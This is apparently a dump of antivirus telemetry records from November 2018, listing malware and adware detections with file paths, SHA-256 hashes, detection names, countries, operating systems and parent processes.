  Row(detection=Row(filename='tmp002909ec', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002909ec', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:37:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2945136.exe', filepath='C:\\Program Files (x86)\\gzpem\\2945136.exe', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Un+USuSfFkW05TtP.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T14:43:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233401-aad35b5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-233401-AAD35B5F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:34:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f898', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f898', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:18:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\setup.exe', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182957-c4c5a408', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-182957-C4C5A408', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:29:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='IT', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:51:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zemax.exe', filepath='G:\\_big 128\\_cad 65\\Zemax OpticStudio 13 Release 2 Sp4 Premium\\1\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='ff573d5ea1cd7a2912ddc3892e1a23c4ddeac81ae1525b27f0f6216155c86646', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8849464, timestamp='2018-11-04T13:24:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142223-9bb04b7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_349b3e19\\AVSCAN-20181104-142052-9230E39A\\AVSCAN-20181104-142223-9BB04B7B', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:22:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsj66CC.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T21:52:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-101726-383b210a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78530d09\\AVSCAN-20181104-101648-1777FC22\\AVSCAN-20181104-101726-383B210A', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:17:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-174818-20d3d8d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0845e96a\\AVSCAN-20181101-174645-0FEFE8A3\\AVSCAN-20181101-174818-20D3D8D4', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='fefefd774d1ba5efc46a0f4273ef0265b4f8460f63f7bffd10b366b368de38eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252206', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252206', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:39:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa213cde1532ba7160b21cc7598f6986416d51a307ba632107f7ca282b0acc5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FA213CDE1532BA7160B21CC7598F6986416D51A307BA632107F7CA282B0ACC5D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa213cde1532ba7160b21cc7598f6986416d51a307ba632107f7ca282b0acc5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:55Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename=' 2013.exe', filepath='D:\\DOKUMENKU\\PM-LKMK\\REKAP ANGSURAN\\REKAP  2013\\ 2013.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105451-63a58173', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bd13db55\\AVSCAN-20181102-101718-9263BFE3\\AVSCAN-20181102-105451-63A58173', filesize=300000, name='PUA/MPCCleaner.#M1.#R1'), hash='15d2c9190929cdf42bc0c52a952f4e9e5d81e47f7b25acd43f026039cf0039d4', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203925-0881f437', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5dc498c\\AVSCAN-20181102-203847-017A3317\\AVSCAN-20181102-203925-0881F437', filesize=2560000, name='TR/BHO.Gen.#M1.#R1'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:39:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155839-e487b11d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155839-E487B11D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='371a4dc09057826ded411fbdd6671464d66341cf8d4871838d70a1b8d8ee65a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\371A4DC09057826DED411FBDD6671464D66341CF8D4871838D70A1B8D8EE65A4', filesize=4000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='371a4dc09057826ded411fbdd6671464d66341cf8d4871838d70a1b8d8ee65a4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:33:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T07:53:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:15:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9870243\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cleanmgr.exe', filepath='H:\\TAILIEUCU\\KHONG DUOC XOA\\O C\\WINDOWS\\system32\\dllcache\\cleanmgr.exe', filesize=64000, name='TR/Crypt.XPACK.Gen2.#M300.#R100299'), hash='1df818743f3c66e8d5af1fa2d651d543d0d126bbf2aaca8492d7c2aa4458b512', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T09:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T01:43:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0005950.exe', filepath='D:\\System Volume Information\\_restore{6B806EF6-C686-49F4-AC4B-5CBDA4B84782}\\RP14\\A0005950.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='25f2073a107d9bee4ebb66c4d4445b53588a4e3a1b2b99d050eed5a948931551', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:45:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-223239-ce26c085', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5732cab4\\AVSCAN-20181102-220138-CABA3555\\AVSCAN-20181102-223239-CE26C085', filesize=128000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172047-10dbed0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00724c0d\\AVSCAN-20181102-171356-C21D45C4\\AVSCAN-20181102-172047-10DBED0B', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:19:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160059-f39bfe4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160059-F39BFE4C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101100-b10d6bfd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101041-AD01BBC6\\AVSCAN-20181102-101100-B10D6BFD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095642-1336395f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_793444eb\\AVSCAN-20181102-093900-8B975244\\AVSCAN-20181102-095642-1336395F', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='12400c625de5c6d1b2da77aa9bd992b2ab281639ccd3b30fee228558f86a89a4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:56:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150045-e6b3598a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150045-E6B3598A', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kesner.vir', filepath='C:\\Program Files (x86)\\frets\\kesner.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='3a2b98eedcc298b7f342be65af38c0d6fdf16716d5cc9158ff9bf77bfce92b5a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6541008, timestamp='2018-11-02T17:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001e076', filepath='C:\\Windows\\Temp\\5f1f5a26-64d4-4ede-8d54-7fccfe113629\\tmp00000160\\tmp0001e076', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T09:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ni license activator.exe', filepath='C:\\Users\\X\\Desktop\\program\\Labview\\NI License Activator.exe', filesize=576000, name='HEUR/AGEN.1000498.#M1.#R1'), hash='4212081a0a93651413f180c8e9e5e95481097b6b66663cca361113bb858f2297', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LDWrswCQlUiBX9qi.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=116928, timestamp='2018-11-02T13:33:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175316-e22b05ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_077ac109\\AVSCAN-20181102-175223-DB7E30F6\\AVSCAN-20181102-175316-E22B05EE', filesize=15936000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='104623bb63d89f25f41512ca8546993f36834376c35c7d460d7c9ad9851dc3c6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:53:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setupmda2769a.exe', filepath='D:\\SetupMDA2769a.exe', filesize=35264000, name='W32/Sality.AT.#M1.#R1'), hash='1cbf877fc51334a3fecbb3af7f127735107ae7addd029054611fe36e204b5b0f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T02:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='privacy', filepath='/Library/Application Support/Malwarebytes/MBAM/Quarantine/Mac Tonic.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.btuqv.#M0.#R0'), hash='4769980682ab8e7efcccff847a70944b55c079ecac65d03059a9924eab9ebe31', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T03:41:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:50:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:13Z'), dt=datetime.date(2018, 11, 2)),
